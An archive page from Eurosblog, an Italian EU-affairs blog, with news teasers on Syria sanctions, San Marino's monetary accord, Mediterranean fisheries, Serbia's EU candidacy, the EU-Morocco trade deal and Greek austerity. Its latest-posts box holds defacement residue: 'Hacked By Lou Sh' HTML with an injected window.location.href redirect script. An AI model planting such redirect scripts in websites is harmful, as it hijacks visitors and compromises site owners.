EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Europa e Mediterraneo

Europa e Mediterraneo


Europa e Mediterraneo

it

Il conflitto siriano sta dettando le priorità dell'agenda politica dei Ventisette, che mirano ad aiutare le popolazioni coinvolte nella guerra civile e ad emarginare Assad.

Il Consiglio affari esteri riunito a Bruxelles ha deliberato lo stanziamento di 20 milioni di euro destinato alla popolazione siriana, martoriata dalla guerra civile in atto nello Stato del Medio Oriente, e l’inasprimento delle sanzioni contro il regime. L’aiuto è rivolto anche ai Paesi vicini, (...)

it

Poco più di un mese fa ha destato scalpore la decisione di annullare il referendum per conoscere il pensiero dei sammarinesi a riguardo dell'entrata nell'Ue. Ora, un nuovo accordo è venuto alla luce e prevede almeno quarantacinque normative approvate dall'Ue alle quali San Marino dovrà adempire onde evitare la caduta dei diritti derivanti da tale accordo. Il patto sancisce che l'enclave non aderirà all'Unione ma avrà un percorso che pian piano lo porterà ad integrarsi nell'organismo europeo per eccellenza

Antonella Mularoni, Segretario di Stato per gli Affari Esteri, e Olli Rehn, vice Presidente della Commissione europea e Commissario per gli Affari economici e monetari, hanno siglato a Bruxelles un accordo monetario tra San Marino e l’Unione Europea. Alla fine del 2000 il piccolo Stato (...)

it

Le istituzioni europee, di fronte alla pressione esercitata dalle associazioni ambientaliste, sta prendendo atto del mutamento e soprattutto dell’impoverimento delle specie che popolano il Mar Mediterraneo. Così si è optato per una revisione della Politica Comune della Pesca e per una maggiore sensibilità e responsabilità nei confronti della fauna ittica. Curiosamente, a farne le spese c’è anche il Commissario Montalbano!

In un mondo in cui si è sempre più sensibili alla sopravvivenza degli ecosistemi e delle specie faunistiche, al riscaldamento globale e al risparmio energetico, la mancanza di attenzione e di rispetto nei confronti di un ambiente importante sembra stonare ed essere fuori luogo. Il poco interesse (...)

it

I leader dell'Unione europea hanno deciso, il 2 Marzo 2012, di concedere alla Serbia la possibilità di entrare a far parte del massimo organismo europeo. La decisione è stata presa dopo una riunione a Bruxelles dove è stato necessario superare le resistenze della Romania, la quale, conoscendo molto bene la situazione delle proprie minoranze valacche e romene in Serbia, aveva bloccato temporaneamente l'assegnazione dello status di candidato all'UE.

Finalmente, viene da dire, la Serbia ha ufficialmente la possibilità di entrare a far parte dell’UE. L’ultimo ostacolo, in ordine di tempo, che ha dovuto affrontare, è stata la forte opposizione romena la quale cercava di ottenere maggiori garanzie per le circa 40.000 persone facenti parte delle (...)

it

Creare nuovi spazi per la partecipazione giovanile alla vita pubblica è la priorità dell’associazione Giosef Italy, da sempre impegnata nella realizzazione di attività e progetti che incoraggiano la partecipazione giovanile in ogni sua forma. Si tratta di un’organizzazione presente su tutto il territorio nazionale e suddivisa in diverse sedi locali ciascuna delle quali ha la libertà di agire in maniera autonoma, usufruendo degli strumenti più consoni alla propria realtà locale. È il caso della Giosef di Caserta, che ha proposto la partecipazione dei giovani ad un’interessante progetto 1.1 Youth in Action: uno scambio culturale, il “Bridge between generation”, che si terrà a Marzo in Bulgaria, precisamente a Karlovo e al quale parteciperanno l’Italia, la Spagna, il Portogallo, la Lituania, la Slovacchia e l’Ungheria.

La “Youth in Action” (Gioventù in azione) è un programma di finanziamento della Commissione europea che ha come obiettivo quello di favorire il processo di integrazione giovanile e che dispone di un budget di 885 milioni di euro, stanziato per sette anni. Un progetto che sostiene attivamente la (...)

it

Approvato con 369 voti favorevoli, il nuovo accordo si pone come principale obiettivo quello di favorire il commercio con il Marocco, garantendo così lo sviluppo di un Paese in forte crisi economica e sociale, ma non sono mancate le opposizioni. Infatti, il trattato ha incontrato la contrarietà di chi, come il presidente della Confagricoltura, Mario Guidi, ha messo in evidenza lo squilibrio creatosi tra Marocco, fortemente avvantaggiato, e l’Europa stessa, verso la quale non sono state previste importanti misure di salvaguardia.

È stato definito lo scorso 16 febbraio l’accordo bilaterale Ue-Marocco, che prevede la liberalizzazione del commercio di prodotti agricoli e della pesca. Il negoziato, approvato dal Parlamento con 369 voti favorevoli, 225 contrari e 31 astensioni, si pone come principale obiettivo quello di (...)

it

Nella serata del 12 Febbraio scorso, il governo del premier Papademos ha ottenuto il voto favorevole del Parlamento greco al piano di austerità presentato al fine di evitare il fallimento dello stato ellenico. Nel frattempo migliaia di persone sono scese in piazza a manifestare.

La Grecia è già qualche mese sull’orlo del baratro e ogni minima scintilla rischia di far incendiare un clima ormai rovente e ai limiti della sopportazione. Dopo le rivolte di gennaio e di fine 2011, questa volta a far scatenare le violenze per le strade è stata la discussione e la successiva (...)

it

La data di scadenza per presentare le candidature al Premio Carlo Magno per la gioventù è stata prorogata fino al 13 febbraio 2012 in maniera tale da permettere ad un numero maggiore di progetti di presentare le loro candidature.

Il “Premio europeo Carlo Magno per la Gioventù”, giunto alla sua quinta edizione,mira ad incentivare la crescita di una coscienza europea tra i giovani e ad aumentare la loro adesione ai progetti d’integrazione europea.

Il concorso, giunto alla sua quinta edizione è organizzato grazie alla (...)

it

Nell’importante evento annuale del World Economic Forum (WEF) svoltosi a Davos fino allo scorso 31 gennaio, il premier britannico Cameron David ha mostrato tutta la sua ostilità verso l’adozione della Tobin Tax. Non sono state clementi le parole utilizzate dal premier, il quale ha definito “pura follia” la proposta di introdurre una tassa sulle transizioni finanziare avanzata da Francia e Germania. In modo particolare, la Francia sembra essere decisa ad andare avanti anche senza l’appoggio dell’Inghilterra per l’effettiva introduzione della tassa.

È giunto alla sua 42esima edizione. Si tratta di uno degli eventi più importanti della politica europea, l’evento definito come l’appuntamento economico più atteso dell’anno, il World Economic Forum (WEF), che si è svolto nella località svizzera di Davos. Cinque giornate interamente dedicate al dialogo (...)

it

Il Parlamento europeo ha chiesto al presidente siriano Bashar al Assad di abbandonare immediatamente il potere e di mettere fine alle brutali repressioni contro i manifestanti. Proposto dagli eurodeputati anche un inasprimento delle già severe sanzioni contro Damasco, mirando al regime senza colpire la popolazione.

L’uccisione di Gheddafi e la fine del regime libico non ha di certo placato i venti della Primavera araba. Il processo di democratizzazione continua passando per la fase più cruenta in Siria. Damasco e dintorni da quasi un anno sono lo scenario di scontri gli oppositori del regime di Bashar al (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France